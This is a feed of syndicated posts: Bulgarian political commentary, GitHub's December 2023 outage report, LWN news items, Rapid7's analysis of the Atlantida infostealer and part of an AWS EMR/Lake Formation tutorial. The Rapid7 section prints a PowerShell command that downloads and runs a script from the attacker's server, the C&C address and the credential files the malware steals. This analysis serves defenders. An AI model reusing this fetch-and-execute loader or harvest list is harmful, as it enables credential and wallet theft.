Could it be that he too, like Daniel Lorer of PP, now believes that Peevski and the DPS are changing for the better?! Naivety is characteristic not of politicians but of voters.

And just when no one was talking about corruption…

To the voting and the forgiveness (not for everyone) is added, however, the ignoring of inconvenient revelations, such as those by BIRD.bg about the property deals of Finance Minister Asen Vasilev and of Lorer. After a US citizen filed a claim for just over 5 million leva against Vasilev’s STV Consulting, which he periodically leaves whenever he enters politics, the company and Lorer sold a building in central Sofia to Intelligent Traffic Systems (ITS) and its owner, Svetoslava Arnaudova. For several years this company held a dominant position in the vignette market and received a commission of 7% on every vignette sold.

Lorer’s apartment in the building was bought for 1 million euros; the rest of the three-story building, the land, garages, and a gym went for nearly 1.5 million euros. In the article “5 inconvenient questions about the property scandal around Asen Vasilev and Daniel Lorer,” Sega notes that the sale price of Lorer’s property works out to “7,940 leva per square meter; that is, he receives much more for his property, given that he did not even pay for the renovation previously carried out by Asen Vasilev’s company.”

New and interesting information has come to light, however: two months before the sale of the properties, the Ministry of Finance published for public consultation amendments to the Public Procurement Act (ZOP) that envisaged dropping the existing exception allowing the API to sign contracts with electronic toll companies without conducting procedures under the ZOP. ITS disagreed and, in the opinion it submitted, insisted that the change be dropped. Which is what happened. Thus Intelligent Traffic Systems and other companies like it retained their privileged position.

So far, apart from statements on Facebook, Vasilev, Lorer, and Arnaudova have all avoided any comment. The PP MP commented on the matter of his property on Thursday, January 18, in a lengthy post on the social network, asserting that he bought and sold at market prices. The Ministry of Finance also published a statement on its website describing as “incorrect the media claims that in June 2023 the Ministry of Finance adopted amendments to the Public Procurement Act under the influence of an external opinion.”

The finance minister has said he will comment once the check by the prosecutor’s office, alerted to the case by the civic association BOEC, is complete. But since the supervising prosecutor considered that the report did not allow a conclusion as to whether financial crimes had been committed, he assigned a check, to be carried out within the next three months, to the Commission for Counteracting Corruption, bTV reported. This is the new unit that investigates persons holding public office. But its new leadership was supposed to be elected by January 6 this year. Parliament has not yet taken up the task of electing the three people who will lead it, one of whom will also be its chair on a rotating basis. According to Capital, this will happen within two months.

High hopes should not be placed in the work of these bodies, because since Ivan Geshev’s removal as prosecutor general, the prosecution has been actively “delousing” prominent figures of the governing majority, such as Borisov, of the investigations against them. It is unlikely to allow the so-called “assemblage” (sglobka) to be spoiled by harm coming to one of its influential politicians, Asen Vasilev. GERB, and the DPS too, are inclined to take the post of deputy prime minister as well after the rotation in March, when Mariya Gabriel will become prime minister of a cabinet formed on GERB’s first mandate.

The landing of the party lieutenants begins.
And if there is anything, there is nothing*.


* A characteristic expression used after visiting friends in socialist times, pacifying guests and hosts if there had been quarrels.

GitHub Availability Report: December 2023

Post Syndicated from Jakub Oleksy original https://github.blog/2024-01-17-github-availability-report-december-2023/

In December, we experienced three incidents that resulted in degraded performance across GitHub services. All three are related to a broad secret rotation initiative in late December. While we have investigated and identified improvements from each of these individual incidents, we are also reviewing wider opportunities to reduce availability risk in our secrets management.

December 27 02:30 UTC (lasting 90 minutes)

While rotating HMAC secrets between GitHub’s frontend service and an internal service, we triggered a bug in how we fetch keys from Azure Key Vault. API calls between the two services started failing when we disabled a key in Key Vault while rolling back a rotation in response to an alert.

As a result, all codespace creations failed between 02:30 and 04:00 UTC on December 27, as did approximately 15% of resumes and some other background functions. We temporarily re-enabled the key in Key Vault to mitigate the impact before deploying a change to continue the secret rotation. The original alert turned out to be a separate issue that was not customer-impacting and was fixed immediately after the incident.

Learning from this, the team has improved the existing playbooks for HMAC key rotation and documentation of our Azure Key Vault implementation.
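To illustrate why disabling a key mid-rotation can break calls between two services, here is a minimal sketch of HMAC verification with an overlap window. It is not GitHub's implementation: the key names, the message, and the `verify` helper are all hypothetical, and a real deployment would fetch key material from a secret store rather than hardcode it.

```python
import hashlib
import hmac
from typing import Dict, Optional


def sign(key: bytes, message: bytes) -> str:
    """Return the hex HMAC-SHA256 tag for message under key."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify(active_keys: Dict[str, bytes], message: bytes, tag: str) -> Optional[str]:
    """Return the id of the first active key that validates tag, else None."""
    for key_id, key in active_keys.items():
        if hmac.compare_digest(sign(key, message), tag):
            return key_id
    return None


# Hypothetical key material, hardcoded only for the sake of the example.
old_key, new_key = b"old-secret", b"new-secret"
message = b"POST /internal/codespaces"

# During the overlap window the receiver accepts both keys.
overlap = {"v1": old_key, "v2": new_key}
tag_from_old_sender = sign(old_key, message)
tag_from_new_sender = sign(new_key, message)
accepted_old = verify(overlap, message, tag_from_old_sender)
accepted_new = verify(overlap, message, tag_from_new_sender)

# Disabling v1 while some senders still sign with it makes their calls fail.
after_disable = {"v2": new_key}
rejected_old = verify(after_disable, message, tag_from_old_sender)
```

In this sketch a key is only safe to disable once no sender signs with it anymore, which is the kind of ordering a rotation playbook can spell out.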

December 28 05:52 UTC (lasting 65 minutes)

Between 05:52 UTC and 06:47 UTC on December 28, certain GitHub email notifications were not sent due to failed authentication between backend services that generate notifications and a subset of our SMTP servers. This primarily impacted CI activity and Gist email notifications.

This was caused by the rotation of authentication credentials between frontend and internal services, which resulted in the SMTP servers not being correctly updated with the new credentials. This triggered an alert for one of the two impacted notification services within minutes of the secret rotation. On-call engineers discovered the incorrect authentication update on the SMTP servers and applied changes to update it, which mitigated the impact.

Repair items have already been completed to update the relevant secrets rotation playbooks and documentation. While the monitor that did fire was sufficient in this case to engage on-call engineers and remediate the incident, we’ve completed an additional repair item to provide earlier alerting across all services moving forward.

December 29 00:34 UTC (lasting 68 minutes)

Users were unable to sign in or sign up for new accounts between 00:34 and 01:42 UTC on December 29. Existing sessions were not impacted.

This was caused by a credential rotation that was not mirrored in our frontend caches, causing a mismatch in behavior between signed-in and signed-out users. We resolved the incident by deploying the updated credentials to our cache service.

Repair items are underway to improve our monitoring of signed-out user experiences and to better manage updates to shared credentials in our systems moving forward.
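One general way to keep a cached credential from going stale after a rotation is to reload it from the source of truth when authentication fails and retry once. The sketch below illustrates that pattern only; it is not how GitHub's caches work, and `SecretStore`, `Backend`, and `CachedClient` are hypothetical names.

```python
class SecretStore:
    """Hypothetical source of truth holding the current credential."""

    def __init__(self, credential: str) -> None:
        self.credential = credential

    def rotate(self, new_credential: str) -> None:
        self.credential = new_credential


class Backend:
    """Hypothetical backend that accepts only the store's current credential."""

    def __init__(self, store: SecretStore) -> None:
        self._store = store

    def login(self, credential: str) -> bool:
        return credential == self._store.credential


class CachedClient:
    """Client that caches the credential and refreshes it after a rejection."""

    def __init__(self, store: SecretStore, backend: Backend) -> None:
        self._store = store
        self._backend = backend
        self._cached = store.credential
        self.refreshes = 0

    def login(self) -> bool:
        if self._backend.login(self._cached):
            return True
        # The cached credential was rejected: reload it and retry once.
        self._cached = self._store.credential
        self.refreshes += 1
        return self._backend.login(self._cached)


store = SecretStore("cred-v1")
backend = Backend(store)
client = CachedClient(store, backend)

before_rotation = client.login()
store.rotate("cred-v2")
stale_attempt = backend.login("cred-v1")  # what a never-refreshed cache would send
after_rotation = client.login()
```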


Please follow our status page for real-time updates on status changes and post-incident recaps. To learn more about what we’re working on, check out the GitHub Engineering Blog.

The post GitHub Availability Report: December 2023 appeared first on The GitHub Blog.

[$] Growing pains for typing in Python

Post Syndicated from jake original https://lwn.net/Articles/958326/

Python’s static-typing feature has come a long way since it was introduced in 2014. Adding type
information to functions has always been—and will remain—optional, but typing
remains somewhat contentious. There are multiple kinds of
consumers of the information, each with their own needs and
wishes, as well as users of the feature with expectations of their own. That has
led to the formation of a Python typing council
to govern the type system for the language, though, as might be guessed,
there are still grumblings from various quarters.

Whispers of Atlantida: Safeguarding Your Digital Treasure

Post Syndicated from Natalie Zargarov original https://blog.rapid7.com/2024/01/17/whispers-of-atlantida-safeguarding-your-digital-treasure/

Whispers of Atlantida: Safeguarding Your Digital Treasure

Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users into downloading a malicious file from a compromised website and uses several evasion techniques, such as reflective loading and injection, before the stealer itself is loaded.

Atlantida steals login information from software such as Telegram and Steam, data from several offline cryptocurrency wallets, browser-stored data, and data from cryptocurrency wallet browser extensions. It also captures the victim’s screen and collects hardware data.


Technical Analysis

Stage 1 – Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:


The decrypted command: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” irm hxxp://166.1.160[.]10/loader.txt | iex

Stage 2 – Three levels of in-memory loading

The executed PowerShell command downloads and executes a next stage PowerShell script in memory.


The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls the DownloadData API function to get a Donut injector. Donut is position-independent code that enables in-memory execution of VBScript, JScript, EXE, and DLL files and .NET assemblies. Next, Donut is injected into a newly created “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe” process by using the remote thread injection technique (aka CreateRemoteThread). This technique works by writing shellcode into the context of another eligible process and creating a thread for that process to run the payload.

Figure 4 – .Net downloader Main function

Stage 3 – Atlantida Stealer

The Donut injector is used to load the final payload, which in our case is the new Atlantida stealer. It is named after a string found in the executable.


First, the Atlantida stealer captures the entire screen by using a combination of the GetDC, CreateCompatibleDC, CreateDIBSection, SelectObject, and BitBlt API functions. Next, it checks whether a FileZilla (open source FTP software that allows users to transfer files from a local to a remote computer) recent servers file exists by attempting to open “C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml”. If the file exists, the stealer reads it. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet path:


The stealer reads all the files found under the enumerated path.

Next, it collects the victim’s hardware data such as RAM, GPU, CPU, and screen resolution. The stealer enumerates the user’s Desktop folder and reads all text files (.txt). It also looks for Binance wallet credentials by enumerating the `C:\Users\Username\AppData\Roaming\Binance` directory and reading all JSON files under it.

Steam (video game digital distribution service) configuration and credentials are also of interest to the Atlantida stealer: we observed it enumerating the Steam configuration directory and searching for the following files:

  1. Ssfn – Steam Sentry File.
  2. Config.vdf – Steam configuration file.
  3. Loginusers.vdf – stores the records of previously logged-in Steam accounts.

Figure 6 – Steam files enumeration

The last thing Atlantida harvests is Telegram data. It collects all the data located in “C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata”.

The stealer now connects to the hardcoded C&C server (45.144.232.99). We accessed the hardcoded IP and reached the login page of what we assume is the stealer’s control panel, which also had an `Atlantida` title.

Figure 7 – Atlantida login page

No data is passed to the C&C server at this point, and the stealer continues its collection. Unlike other stealers, Atlantida focuses on only three web browsers: Google Chrome, Mozilla Firefox, and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards, and autofill data.

One of the notable functions of the Atlantida stealer is its ability to steal data from Chrome-based browser extensions. Each Chrome-based extension is assigned an “Extension ID”. The malware uses this ID to harvest the data stored within the extension. Atlantida harvests data from the following cryptocurrency wallet extensions:


When the stealer finishes the collection, all data is compressed and sent to the C&C server. Then the malware exits.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rules are currently deployed and alerting on the activity described in this blog:

  • Suspicious Process – MSHTA Spawns PowerShell
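For readers without those rules, the parent-child relationship the rule name describes can be approximated over process-creation events. The following is a rough sketch, not Rapid7's detection logic: the event field names (`parent_image`, `image`, `command_line`) are assumptions about how a telemetry source might label them, and the sample events are made up from the command shown in Stage 1.

```python
import ntpath
from typing import Dict, List

POWERSHELL_NAMES = {"powershell.exe", "pwsh.exe"}


def exe_name(path: str) -> str:
    """Lower-cased file name of a Windows path, regardless of host OS."""
    return ntpath.basename(path).lower()


def mshta_spawns_powershell(event: Dict[str, str]) -> bool:
    """True when the parent process is mshta.exe and the child is PowerShell."""
    return (
        exe_name(event.get("parent_image", "")) == "mshta.exe"
        and exe_name(event.get("image", "")) in POWERSHELL_NAMES
    )


# Hypothetical process-creation events.
events: List[Dict[str, str]] = [
    {
        "parent_image": r"C:\Windows\System32\mshta.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe irm hxxp://166.1.160[.]10/loader.txt | iex",
    },
    {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe Get-Date",
    },
]

alerts = [event for event in events if mshta_spawns_powershell(event)]
```

Matching on the file name alone is easy to evade by renaming binaries, so a production rule would likely combine it with other signals.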

MITRE ATT&CK Techniques:


IOCs


Please welcome Daroc Alden

Post Syndicated from corbet original https://lwn.net/Articles/958444/

When, at the beginning of November, we posted an open position at LWN, we were only so
hopeful; experience has shown that finding writers who are both capable of
and interested in writing our sort of material is a challenging task. This
time, though, hope was justified: we got a surprising number of
applications from highly qualified applicants. The hardest part of the
task has, instead, been narrowing down the choice to a hiring decision.

We are pleased to announce that Daroc Alden has just joined LWN’s staff.

Daroc is a programmer from New England, where they live with their
spouse and their cat. They graduated with a Master’s degree in Computer
Science from the University of New Hampshire. In their spare time, they
enjoy fiction writing and musicals. They are especially interested in
programming language theory and implementation.

Daroc will be taking on some of the load of keeping LWN interesting while
helping us to expand our content mix in the areas that our readers are
interested in. Please give them your support as they come up to speed
within our operation. We are looking forward to having Daroc as part of a
reinforced and more energetic LWN going forward.

Kicinski: netdev in 2023

Post Syndicated from corbet original https://lwn.net/Articles/958518/

Networking maintainer Jakub Kicinski (along with several collaborators) has
put up a summary of
what happened in the kernel’s network stack
during 2023.

Throughout those releases netdev patch handlers (DaveM, Jakub,
Paolo) applied 7243 patches, and the resulting pull requests to
Linus described the changes in 6398 words. Given the volume of work
we cannot go over every improvement, or even cover networking
sub-trees in much detail (BPF enhancements… wireless work on WiFi
7…). We instead try to focus on major themes, and developments we
subjectively find interesting.

Enforce fine-grained access control on Open Table Formats via Amazon EMR integrated with AWS Lake Formation

Post Syndicated from Raymond Lai original https://aws.amazon.com/blogs/big-data/enforce-fine-grained-access-control-on-open-table-formats-via-amazon-emr-integrated-with-aws-lake-formation/

With Amazon EMR 6.15, we launched AWS Lake Formation based fine-grained access controls (FGAC) on Open Table Formats (OTFs), including Apache Hudi, Apache Iceberg, and Delta Lake. This allows you to simplify security and governance over transactional data lakes by providing table-, column-, and row-level access controls for your Apache Spark jobs. Many large enterprise companies seek to use their transactional data lake to gain insights and improve decision-making. You can build a lake house architecture using Amazon EMR integrated with Lake Formation for FGAC. This combination of services allows you to conduct data analysis on your transactional data lake while ensuring secure and controlled access.

The Amazon EMR record server component supports table-, column-, row-, cell-, and nested attribute-level data filtering functionality. It extends support to Hive, Apache Hudi, Apache Iceberg, and Delta Lake formats for both read (including time travel and incremental query) and write operations (on DML statements such as INSERT). Additionally, with version 6.15, Amazon EMR introduces access control protection for its application web interfaces, such as the on-cluster Spark History Server, YARN Timeline Server, and YARN Resource Manager UI.

In this post, we demonstrate how to implement FGAC on Apache Hudi tables using Amazon EMR integrated with Lake Formation.

Transaction data lake use case

Amazon EMR customers often use Open Table Formats to support their ACID transaction and time travel needs in a data lake. By preserving historical versions, data lake time travel provides benefits such as auditing and compliance, data recovery and rollback, reproducible analysis, and data exploration at different points in time.

Another popular transaction data lake use case is incremental query. Incremental query refers to a query strategy that focuses on processing and analyzing only the new or updated data within a data lake since the last query. The key idea behind incremental queries is to use metadata or change tracking mechanisms to identify the new or modified data since the last query. By identifying these changes, the query engine can optimize the query to process only the relevant data, significantly reducing the processing time and resource requirements.
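The difference between time travel and incremental query can be shown with a toy commit log in plain Python. This is a conceptual sketch only, not Hudi's storage model or API: the commit times, record keys, and the `time_travel` and `incremental` helpers are all hypothetical, and the log is assumed to be ordered by commit time.

```python
from typing import Dict, List, Tuple

# Each commit is (commit_time, {record_key: row}); all values are made up.
Commit = Tuple[str, Dict[str, Dict[str, str]]]

commits: List[Commit] = [
    ("20240101", {"c1": {"name": "Ann", "city": "Oslo"}}),
    ("20240102", {"c2": {"name": "Bo", "city": "Rome"}}),
    ("20240103", {"c1": {"name": "Ann", "city": "Lima"}}),
]


def time_travel(log: List[Commit], as_of: str) -> Dict[str, Dict[str, str]]:
    """Snapshot of the table as of a commit time: replay upserts up to as_of."""
    snapshot: Dict[str, Dict[str, str]] = {}
    for commit_time, rows in log:
        if commit_time <= as_of:
            snapshot.update(rows)
    return snapshot


def incremental(log: List[Commit], since: str) -> Dict[str, Dict[str, str]]:
    """Only rows written by commits strictly after `since` (latest per key)."""
    changed: Dict[str, Dict[str, str]] = {}
    for commit_time, rows in log:
        if commit_time > since:
            changed.update(rows)
    return changed


snapshot_jan2 = time_travel(commits, "20240102")  # table as it looked on Jan 2
changes_since_jan2 = incremental(commits, "20240102")  # only what changed later
```

The snapshot still shows the first version of record `c1`, while the incremental result contains only the later update to it, so a downstream job has far less data to process.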

Solution overview

In this post, we demonstrate how to implement FGAC on Apache Hudi tables using Amazon EMR on Amazon Elastic Compute Cloud (Amazon EC2) integrated with Lake Formation. Apache Hudi is an open source transactional data lake framework that greatly simplifies incremental data processing and the development of data pipelines. This new FGAC feature supports all OTFs. We demonstrate it with Hudi here and will cover other OTF tables in follow-up posts. We use notebooks in Amazon SageMaker Studio to read and write Hudi data via different user access permissions through an EMR cluster. This reflects real-world data access scenarios: for example, an engineering user may need full data access to troubleshoot a data platform, whereas data analysts may only need access to a subset of that data that doesn’t contain personally identifiable information (PII). Integrating with Lake Formation via the Amazon EMR runtime role further enables you to improve your data security posture and simplifies data control management for Amazon EMR workloads. This solution ensures a secure and controlled environment for data access, meeting the diverse needs and security requirements of different users and roles in an organization.

The following diagram illustrates the solution architecture.

Solution architecture

We conduct a data ingestion process to upsert (update and insert) a Hudi dataset to an Amazon Simple Storage Service (Amazon S3) bucket, and persist or update the table schema in the AWS Glue Data Catalog. With zero data movement, we can query the Hudi table governed by Lake Formation via various AWS services, such as Amazon Athena, Amazon EMR, and Amazon SageMaker.

When users submit a Spark job through any of the EMR cluster endpoints (EMR Steps, Livy, EMR Studio, and SageMaker), Lake Formation validates their privileges and instructs the EMR cluster to filter out sensitive data such as PII.

This solution has three different types of users with different levels of permissions to access the Hudi data:

  • hudi-db-creator-role – This is used by the data lake administrator who has privileges to carry out DDL operations such as creating, modifying, and deleting database objects. They can define data filtering rules on Lake Formation for row-level and column-level data access control. These FGAC rules ensure that the data lake is secured and meets the required data privacy regulations.
  • hudi-table-pii-role – This is used by engineering users. The engineering users are capable of carrying out time travel and incremental queries on both Copy-on-Write (CoW) and Merge-on-Read (MoR) tables. They also have the privilege to access PII data as of any timestamp.
  • hudi-table-non-pii-role – This is used by data analysts. Data analysts’ data access rights are governed by FGAC authorized rules controlled by data lake administrators. They do not have visibility on columns containing PII data like names and addresses. Additionally, they can’t access rows of data that don’t fulfill certain conditions. For example, users can access only the data rows that belong to their country.
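The effect of these roles can be pictured as a column allow-list plus a row predicate applied before any data reaches the user. The sketch below is a plain-Python illustration of that idea, not how Lake Formation or the EMR record server enforce it; the `Policy` class, the column names, and the sample rows are hypothetical.

```python
from typing import Callable, Dict, List, Optional, Set

Row = Dict[str, str]


class Policy:
    """Column allow-list (None means all columns) plus a row-level predicate."""

    def __init__(self, columns: Optional[Set[str]], row_filter: Callable[[Row], bool]) -> None:
        self.columns = columns
        self.row_filter = row_filter


def apply_policy(rows: List[Row], policy: Policy) -> List[Row]:
    """Return only the rows and columns the policy allows."""
    visible: List[Row] = []
    for row in rows:
        if not policy.row_filter(row):
            continue
        if policy.columns is None:
            visible.append(dict(row))
        else:
            visible.append({k: v for k, v in row.items() if k in policy.columns})
    return visible


# Made-up sample data; "name" and "address" stand in for PII columns.
rows: List[Row] = [
    {"id": "1", "name": "Ann", "address": "1 Main St", "country": "US", "amount": "10"},
    {"id": "2", "name": "Bo", "address": "2 Via Roma", "country": "IT", "amount": "20"},
]

policies = {
    # Engineering users: every column, every row.
    "hudi-table-pii-role": Policy(None, lambda row: True),
    # Data analysts: no PII columns, and only rows for their own country.
    "hudi-table-non-pii-role": Policy(
        {"id", "country", "amount"}, lambda row: row["country"] == "US"
    ),
}

engineer_view = apply_policy(rows, policies["hudi-table-pii-role"])
analyst_view = apply_policy(rows, policies["hudi-table-non-pii-role"])
```

Here the analyst view contains a single row with three columns, while the engineer view is the full table.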

Prerequisites

You can download the three notebooks used in this post from the GitHub repo.

Before you deploy the solution, make sure you have the following:

Complete the following steps to set up your permissions:

  1. Log in to your AWS account with your admin IAM user.

Make sure you are in the us-east-1 Region.

  2. Create an S3 bucket in the us-east-1 Region (for example, emr-fgac-hudi-us-east-1-<ACCOUNT ID>).

Next, we enable Lake Formation by changing the default permission model.

  1. Sign in to the Lake Formation console as the administrator user.
  2. Choose Data Catalog settings under Administration in the navigation pane.
  3. Under Default permissions for newly created databases and tables, deselect Use only IAM access control for new databases and Use only IAM access control for new tables in new databases.
  4. Choose Save.

Data Catalog settings

Alternatively, you need to revoke IAMAllowedPrincipals on resources (databases and tables) created if you started Lake Formation with the default option.

Next, we create a key pair for Amazon EMR.

  1. On the Amazon EC2 console, choose Key pairs in the navigation pane.
  2. Choose Create key pair.
  3. For Name, enter a name (for example, emr-fgac-hudi-keypair).
  4. Choose Create key pair.

Create key pair

The generated key pair (for this post, emr-fgac-hudi-keypair.pem) is saved to your local computer.

Next, we create an AWS Cloud9 interactive development environment (IDE).

  1. On the AWS Cloud9 console, choose Environments in the navigation pane.
  2. Choose Create environment.
  3. For Name, enter a name (for example, emr-fgac-hudi-env).
  4. Keep the other settings as default.

Cloud9 environment

  5. Choose Create.
  6. When the IDE is ready, choose Open to open it.

cloud9 environment

  7. In the AWS Cloud9 IDE, on the File menu, choose Upload Local Files.

Upload local file

  8. Upload the key pair file (emr-fgac-hudi-keypair.pem).
  9. Choose the plus sign and choose New Terminal.

new terminal

  10. In the terminal, input the following command lines:
# Create encryption certificates for EMR in-transit encryption
# (2048-bit RSA key; 1024-bit keys are considered too weak)
openssl req -x509 \
-newkey rsa:2048 \
-keyout privateKey.pem \
-out certificateChain.pem \
-days 365 \
-nodes \
-subj '/C=US/ST=Washington/L=Seattle/O=MyOrg/OU=MyDept/CN=*.compute.internal'
cp certificateChain.pem trustedCertificates.pem

# Zip certificates
zip -r -X my-certs.zip certificateChain.pem privateKey.pem trustedCertificates.pem

# Upload the certificates zip file to S3 bucket
# Replace <ACCOUNT ID> with your AWS account ID
aws s3 cp ./my-certs.zip s3://emr-fgac-hudi-us-east-1-<ACCOUNT ID>/my-certs.zip

Note that the example code is a proof of concept for demonstration purposes only. For production systems, use a trusted certification authority (CA) to issue certificates. Refer to Providing certificates for encrypting data in transit with Amazon EMR encryption for details.

Deploy the solution via AWS CloudFormation

We provide an AWS CloudFormation template that automatically sets up the following services and components:

  • An S3 bucket for the data lake. It contains the sample TPC-DS dataset.
  • An EMR cluster with security configuration and public DNS enabled.
  • EMR runtime IAM roles with Lake Formation fine-grained permissions:
    • <STACK-NAME>-hudi-db-creator-role – This role is used to create Apache Hudi database and tables.
    • <STACK-NAME>-hudi-table-pii-role – This role provides permission to query all columns of Hudi tables, including columns with PII.
    • <STACK-NAME>-hudi-table-non-pii-role – This role provides permission to query Hudi tables that have filtered out PII columns by Lake Formation.
  • SageMaker Studio execution roles that allow the users to assume their corresponding EMR runtime roles.
  • Networking resources such as VPC, subnets, and security groups.

Complete the following steps to deploy the resources:

  1. Choose Quick create stack to launch the CloudFormation stack.
  2. For Stack name, enter a stack name (for example, rsv2-emr-hudi-blog).
  3. For Ec2KeyPair, enter the name of your key pair.
  4. For IdleTimeout, enter an idle timeout for the EMR cluster to avoid paying for the cluster when it’s not being used.
  5. For InitS3Bucket, enter the S3 bucket name you created to save the Amazon EMR encryption certificate .zip file.
  6. For S3CertsZip, enter the S3 URI of the Amazon EMR encryption certificate .zip file.

CloudFormation template

  1. Select I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  2. Choose Create stack.

The CloudFormation stack deployment takes around 10 minutes.
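If you script the deployment instead of using the console, the stack parameters from the preceding steps can be collected as follows. This is a sketch only: the helper name and the sample values are hypothetical, the parameter keys are the ones named in the steps above, and the list uses the ParameterKey/ParameterValue shape that the CloudFormation CreateStack API accepts. The template location isn't given in this post, so the sketch stops short of creating the stack.

```python
def build_stack_parameters(ec2_key_pair, idle_timeout, init_s3_bucket, s3_certs_zip):
    """Return CloudFormation parameters as a list of ParameterKey/ParameterValue dicts."""
    values = {
        "Ec2KeyPair": ec2_key_pair,
        "IdleTimeout": str(idle_timeout),  # CloudFormation parameter values are passed as strings
        "InitS3Bucket": init_s3_bucket,
        "S3CertsZip": s3_certs_zip,
    }
    return [{"ParameterKey": key, "ParameterValue": value} for key, value in values.items()]


# Sample values are placeholders; replace them with your own.
parameters = build_stack_parameters(
    ec2_key_pair="emr-fgac-hudi-keypair",
    idle_timeout=3600,
    init_s3_bucket="emr-fgac-hudi-us-east-1-111122223333",
    s3_certs_zip="s3://emr-fgac-hudi-us-east-1-111122223333/my-certs.zip",
)
```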

Set up Lake Formation for Amazon EMR integration

Complete the following steps to set up Lake Formation:

  1. On the Lake Formation console, choose Application integration settings under Administration in the navigation pane.
  2. Select Allow external engines to filter data in Amazon S3 locations registered with Lake Formation.
  3. Choose Amazon EMR for Session tag values.
  4. Enter your AWS account ID for AWS account IDs.
  5. Choose Save.

LF - Application integration settings

  1. Choose Databases under Data Catalog in the navigation pane.
  2. Choose Create database.
  3. For Name, enter default.
  4. Choose Create database.

LF - create database

  1. Choose Data lake permissions under Permissions in the navigation pane.
  2. Choose Grant.
  3. Select IAM users and roles.
  4. Choose your IAM roles.
  5. For Databases, choose default.
  6. For Database permissions, select Describe.
  7. Choose Grant.

LF - Grant data permissions

Copy Hudi JAR file to Amazon EMR HDFS

To use Hudi with Jupyter notebooks, you need to complete the following steps for the EMR cluster, which includes copying a Hudi JAR file from the Amazon EMR local directory to its HDFS storage, so that you can configure a Spark session to use Hudi:

  1. Authorize inbound SSH traffic (port 22).
  2. Copy the value for Primary node public DNS (for example, ec2-XXX-XXX-XXX-XXX.compute-1.amazonaws.com) from the EMR cluster Summary section.

EMR cluster summary

  1. Go back to the AWS Cloud9 terminal you used earlier to create the encryption certificates.
  2. Run the following command to SSH into the EMR primary node. Replace the placeholder with your EMR DNS hostname:
chmod 400 emr-fgac-hudi-keypair.pem
ssh -i emr-fgac-hudi-keypair.pem hadoop@ec2-XXX-XXX-XXX-XXX.compute-1.amazonaws.com
  1. Run the following command to copy the Hudi JAR file to HDFS:
hdfs dfs -mkdir -p /apps/hudi/lib
hdfs dfs -copyFromLocal /usr/lib/hudi/hudi-spark-bundle.jar /apps/hudi/lib/hudi-spark-bundle.jar
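With the JAR in HDFS, a notebook session can point Spark at it. The following sketch prints a SparkMagic %%configure cell body. The spark.jars path is the HDFS location used above; the other three settings are the ones Apache Hudi documents for Spark SQL. The exact configuration in the notebooks for this post may differ, so treat the helper and its defaults as assumptions.

```python
import json

# HDFS path that the hdfs dfs -copyFromLocal command above writes to.
HUDI_JAR_HDFS_PATH = "hdfs:///apps/hudi/lib/hudi-spark-bundle.jar"


def build_spark_conf(jar_path=HUDI_JAR_HDFS_PATH):
    """Return a session configuration dict for a Hudi-enabled Spark session (sketch)."""
    return {
        "conf": {
            "spark.jars": jar_path,
            "spark.serializer": "org.apache.spark.serializer.KryoSerializer",
            "spark.sql.extensions": "org.apache.spark.sql.hudi.HoodieSparkSessionExtension",
            "spark.sql.catalog.spark_catalog": "org.apache.spark.sql.hudi.catalog.HoodieCatalog",
        }
    }


# Print a cell body you could paste into the first cell of a notebook.
print("%%configure -f")
print(json.dumps(build_spark_conf(), indent=2))
```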

Create the Hudi database and tables in Lake Formation

Now we’re ready to create the Hudi database and tables with FGAC enabled by the EMR runtime role. The EMR runtime role is an IAM role that you can specify when you submit a job or query to an EMR cluster.

Grant database creator permission

First, let’s grant the Lake Formation database creator permission to <STACK-NAME>-hudi-db-creator-role:

  1. Log in to your AWS account as an administrator.
  2. On the Lake Formation console, choose Administrative roles and tasks under Administration in the navigation pane.
  3. Confirm that your AWS login user has been added as a data lake administrator.
  4. In the Database creator section, choose Grant.
  5. For IAM users and roles, choose <STACK-NAME>-hudi-db-creator-role.
  6. For Catalog permissions, select Create database.
  7. Choose Grant.

Register the data lake location

Next, let’s register the S3 data lake location in Lake Formation:

  1. On the Lake Formation console, choose Data lake locations under Administration in the navigation pane.
  2. Choose Register location.
  3. For Amazon S3 path, choose Browse and choose the data lake S3 bucket (<STACK_NAME>-s3bucket-XXXXXXX) created by the CloudFormation stack.
  4. For IAM role, choose <STACK-NAME>-hudi-db-creator-role.
  5. For Permission mode, select Lake Formation.
  6. Choose Register location.

LF - Register location

Grant data location permission

Next, we need to grant <STACK-NAME>-hudi-db-creator-role the data location permission:

  1. On the Lake Formation console, choose Data locations under Permissions in the navigation pane.
  2. Choose Grant.
  3. For IAM users and roles, choose <STACK-NAME>-hudi-db-creator-role.
  4. For Storage locations, enter the S3 bucket (<STACK_NAME>-s3bucket-XXXXXXX).
  5. Choose Grant.

LF - Grant permissions

Connect to the EMR cluster

Now, let’s use a Jupyter notebook in SageMaker Studio to connect to the EMR cluster with the database creator EMR runtime role:

  1. On the SageMaker console, choose Domains in the navigation pane.
  2. Choose the domain <STACK-NAME>-Studio-EMR-LF-Hudi.
  3. On the Launch menu next to the user profile <STACK-NAME>-hudi-db-creator, choose Studio.

SM - Domain details

  1. Download the notebook rsv2-hudi-db-creator-notebook.
  2. Choose the upload icon.

SM Studio - Upload

  1. Choose the downloaded Jupyter notebook and choose Open.
  2. Open the uploaded notebook.
  3. For Image, choose SparkMagic.
  4. For Kernel, choose PySpark.
  5. Leave the other configurations as default and choose Select.

SM Studio - Change environment

  1. Choose Cluster to connect to the EMR cluster.

SM Studio - connect EMR cluster

  1. Choose the EMR on EC2 cluster (<STACK-NAME>-EMR-Cluster) created with the CloudFormation stack.
